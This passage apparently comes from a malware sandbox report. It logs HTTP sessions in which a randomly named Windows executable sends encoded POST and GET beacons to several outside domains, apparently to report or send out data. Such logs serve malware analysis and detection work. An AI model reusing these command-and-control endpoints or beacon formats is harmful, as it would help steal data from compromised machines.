                                                            Dec 5, 2024 19:40:14.756560087 CET1236INData Raw: 33 2e 35 34 35 2d 31 35 2e 32 38 39 2d 32 31 2e 33 35 36 2d 33 31 2e 37 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37
                                                            Data Ascii: 3.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238
                                                            Dec 5, 2024 19:40:14.756881952 CET1236INData Raw: 33 2d 32 2e 35 33 34 2d 31 2e 33 34 31 2d 35 2e 30 30 32 2d 32 2e 34 30 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35
                                                            Data Ascii: 3-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.
                                                            Dec 5, 2024 19:40:14.756897926 CET1236INData Raw: 35 35 20 31 39 2e 33 38 34 7a 6d 33 32 2e 39 32 32 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36
                                                            Data Ascii: 55 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2
                                                            Dec 5, 2024 19:40:14.757006884 CET848INData Raw: 2e 39 31 35 2d 2e 32 37 36 2e 36 34 35 2d 2e 39 30 31 20 31 2e 30 37 32 2d 31 2e 36 30 32 20 31 2e 30 39 35 6c 2d 2e 30 31 33 2e 30 36 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37
                                                            Data Ascii: .915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.28
                                                            Dec 5, 2024 19:40:14.876812935 CET1236INData Raw: 37 2d 2e 30 33 38 2d 31 2e 37 37 36 2d 2e 38 37 37 2d 31 2e 37 33 38 2d 31 2e 38 37 34 2e 30 33 38 2d 2e 39 39 37 2e 38 37 37 2d 31 2e 37 37 36 20 31 2e 38 37 34 2d 31 2e 37 33 38 6c 31 35 2e 38 39 32 2e 35 38 37 20 32 2e 34 33 39 2d 38 2e 33 33
                                                            Data Ascii: 7-.038-1.776-.877-1.738-1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.352.651-.172 1.345.034 1.796.534.452.5.586 1.211.348 1.841l-2.825 9.693c-.232.793-.974 1.327-1.8 1.294z"/><path fill="#fc3" d="M46.9


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            9          | 192.168.2.7 | 49872       | 104.21.41.74   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:20.432786942 CET | 817               | OUT       | POST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 39 33 39 33 48 49 53 6e 6a 57 41 72 6e 61 74 72 6b 6a 41 78 74 53 75 6d 39 68 79 56 39 41 79 53 36 36 77 2b 46 70 37 78 4f 68 43 42 46 36 76 37 53 75 2f 53 34 33 33 70 74 35 6b 33 78 48 4f 7a 54 4e 49 6e 59 43 2b 34 38 72 52 4e 62 77 42 7a 43 42 39 66 68 6d 49 72 6d 54 37 34 38 42 39 5a 74 79 64 37 4c 6f 48 79 6b 72 74 65 75 49 79 31 33 58 75 63 65 34 68 67 4a 45 5a 65 61 73 30 64 58 6c 65 62 68 45 6a 71 79 2b 62 59 64 63 70 66 7a 6c 65 79 2f 74 69 35 6f 4b 2f 57 61 47 4b 35 59 5a 64 46 52 52 4a 52 4d 59 58 5a 50 31 48 78 47 61 2b 6d 57 74 4b 61 49 76 76 6e 62 77 58 79 78 69 34 71 6b 51 3d 3d
                                                            Data Ascii: wVb0=p1DRQC/le5qi9393HISnjWArnatrkjAxtSum9hyV9AyS66w+Fp7xOhCBF6v7Su/S433pt5k3xHOzTNInYC+48rRNbwBzCB9fhmIrmT748B9Ztyd7LoHykrteuIy13Xuce4hgJEZeas0dXlebhEjqy+bYdcpfzley/ti5oK/WaGK5YZdFRRJRMYXZP1HxGa+mWtKaIvvnbwXyxi4qkQ==


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            10         | 192.168.2.7 | 49880       | 104.21.41.74   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:23.094743967 CET | 837               | OUT       | POST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 6d 53 36 59 34 2b 45 6f 37 78 43 42 43 42 52 71 75 7a 50 2b 2f 46 34 33 79 57 74 37 41 33 78 48 61 7a 54 50 41 6e 59 31 43 37 2b 37 52 50 58 51 42 78 66 52 39 66 68 6d 49 72 6d 58 62 53 38 41 5a 5a 74 43 74 37 4c 4e 37 39 36 37 74 66 70 49 79 31 67 48 75 59 65 34 68 57 4a 46 46 30 61 70 77 64 58 6b 75 62 69 56 6a 74 38 4f 62 53 41 4d 6f 7a 79 57 6e 49 77 2f 2b 68 67 64 62 32 59 6b 62 63 64 76 63 6e 4c 7a 46 39 53 4a 76 69 4c 33 6a 48 52 38 6a 54 55 73 4f 43 46 4e 62 47 45 48 79 59 38 77 5a 75 79 67 37 38 76 38 39 59 64 52 35 70 68 6f 41 2b 67 4a 7a 46 65 47 63 3d
                                                            Data Ascii: wVb0=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79ymS6Y4+Eo7xCBCBRquzP+/F43yWt7A3xHazTPAnY1C7+7RPXQBxfR9fhmIrmXbS8AZZtCt7LN7967tfpIy1gHuYe4hWJFF0apwdXkubiVjt8ObSAMozyWnIw/+hgdb2YkbcdvcnLzF9SJviL3jHR8jTUsOCFNbGEHyY8wZuyg78v89YdR5phoA+gJzFeGc=


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            11         | 192.168.2.7 | 49886       | 104.21.41.74   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:25.763094902 CET | 1850              | OUT       | POST /m7wz/ HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.conansog.shop
                                                            Referer: http://www.conansog.shop/m7wz/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 65 53 36 71 41 2b 46 4c 54 78 44 42 43 42 4f 61 75 79 50 2b 2f 45 34 33 4b 53 74 37 4d 34 78 46 69 7a 53 71 55 6e 54 68 57 37 33 37 52 50 4b 41 42 79 43 42 38 58 68 6d 59 6e 6d 54 2f 53 38 41 5a 5a 74 42 31 37 43 34 48 39 34 37 74 65 75 49 79 44 33 58 75 77 65 34 35 47 4a 46 78 4f 61 61 49 64 58 45 2b 62 79 33 4c 74 36 65 62 63 54 38 6f 72 79 58 62 74 77 2b 53 48 67 59 50 49 59 6b 7a 63 64 5a 46 77 54 6a 42 34 4a 4a 7a 63 45 68 72 55 64 50 58 48 54 74 47 4c 4b 2b 4c 70 46 55 32 6d 6b 6a 6b 6d 37 48 62 34 7a 65 42 6f 59 44 52 34 6b 2b 6c 41 6e 72 58 43 63 77 52 69 59 36 46 69 2b 61 50 6e 62 48 59 44 6a 71 6c 41 33 72 78 58 66 6f 6f 32 63 7a 63 39 6d 64 64 54 33 77 39 48 66 55 44 6e 4a 70 4f 51 74 30 5a 7a 57 43 38 53 57 39 78 52 5a 67 75 64 55 37 59 58 4c 5a 71 2f 4f 36 31 31 64 76 71 2b 6d 7a 39 33 79 5a 61 6e 69 4b 68 31 6e 36 69 78 41 78 67 69 58 50 44 70 74 [TRUNCATED]
                                                            Data Ascii: wVb0=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 [TRUNCATED]


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            12         | 192.168.2.7 | 49892       | 104.21.41.74   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:28.420234919 CET | 550               | OUT       | GET /m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.conansog.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:08.347903967 CET | 961               | IN        | HTTP/1.1 522
                                                            Date: Thu, 05 Dec 2024 18:41:08 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LS0%2Fj5AkeXP%2FkAImuv1XvwobwcACeso04f18TnPCCm8iZOsjjCOg9phwkjcVdG6l5KHhz363LOyRcrtn9UBAOP6oExIg5x0kegF0%2B7MF%2Fyt9UF5TAwgn5WJlWu3xVTwbn0uXRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ed62a375def41c3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            13         | 192.168.2.7 | 49984       | 85.159.66.93   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:14.595369101 CET | 823               | OUT       | POST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=Xqn0ftDeUaM65DHfmqOD96jp2+7Od4RSjdmCtzxoE2c1AGFBfnxB+HZCNXXJRo8InzqRbStOhiXHM5khpz+NxOOqBEg1PQI4nT6jJOYbYtdkcd6YsFpQr24ZmBqXw6dt8HeAXaSYVJIrhV7nUD8hsYspDK8Kz0q5yxINrT5Sq22F03X9bLAwYbD7r6cpoQR/AR6w6PPvU2RaHFke7w==


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            14         | 192.168.2.7 | 49985       | 85.159.66.93   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:17.262343884 CET | 843               | OUT       | POST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=Xqn0ftDeUaM66jXfqsGD6ajmqu7OTYRWjdqCty14EEI1Hj5BejlBwnZCD3XAfI8Dnz23bQJOhm/HM4UhoAWOweOSJkg3SAI4nT6jJKIxYt1kcsKYukpTlW5rnBqX06d28HeyXYrzVPUrhXjnVS8ilYsrMq9Y+x3ltBM3uhJpynK8xBWfBpMcGK7Av44f/2MKCQ+o3t7OLB0wKXFatCcRmP31cWQtcKVsHamaIu0=


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            15         | 192.168.2.7 | 49986       | 85.159.66.93   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:19.923261881 CET | 1856              | OUT       | POST /80gy/ HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.beythome.online
                                                            Referer: http://www.beythome.online/80gy/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0= [TRUNCATED]


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            16         | 192.168.2.7 | 49987       | 85.159.66.93   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:22.591773987 CET | 552               | OUT       | GET /80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.beythome.online
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:23.933490038 CET | 225               | IN        | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.1
                                                            Date: Thu, 05 Dec 2024 18:41:23 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            X-Rate-Limit-Limit: 5s
                                                            X-Rate-Limit-Remaining: 19
                                                            X-Rate-Limit-Reset: 2024-12-05T18:41:28.7071560Z


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            17         | 192.168.2.7 | 49988       | 103.21.221.4   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:29.873936892 CET | 844               | OUT       | POST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=IcIMsTazYCJeIPdA2CVJjUjwZGseKpOtn7vWThj/DV6aJcOTbkIjxNmPM0QJltze/gY1IVV3fo2XDcZCPZmvdttZHu7alkmr3ANJa8cS9kG2SMkqWn24/IKV8ZFzYa0RqQXyWtwXLRsgU4kGRhn2C/DrVjA4qvJ4VBie5bS/nlEaf6XRAJuSaeIPZGzdg0xtv7B24azzoDtbxf2MwQ==
                                                            Dec 5, 2024 19:41:31.426230907 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:31 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            18         | 192.168.2.7 | 49989       | 103.21.221.4   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:32.545327902 CET | 864               | OUT       | POST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0=IcIMsTazYCJeJs1A6B9JqUiCcGseT5Opn7jWTjPvCmOaO4KTYg8j2NmPDUQMrNyS/gUHIXR3foyXDcpCOqesf9tHfe7U40mr3ANJa/hJ9lu2Sc0qWFO58IKUrpFzJK0VqQWRWvI5LTkgU9YGSwn5L/DtbDB4i9graz+X3I3rpyUeaMWzari+EPw0dEXr3SsYt6Fu14HS30Ix8NXImpQU8codRb+B2f9J/PVAKiY=
                                                            Dec 5, 2024 19:41:34.089931965 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:33 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            19         | 192.168.2.7 | 49990       | 103.21.221.4   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:35.215956926 CET | 1877              | OUT       | POST /0kli/ HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.tempatmudisini06.click
                                                            Referer: http://www.tempatmudisini06.click/0kli/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Ascii: wVb0= [TRUNCATED]
                                                            Dec 5, 2024 19:41:36.764065981 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 796
                                                            date: Thu, 05 Dec 2024 18:41:36 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            20         | 192.168.2.7 | 49991       | 103.21.221.4   | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:41:37.865684032 CET | 559               | OUT       | GET /0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.tempatmudisini06.click
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:41:39.431226969 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                            Connection: close
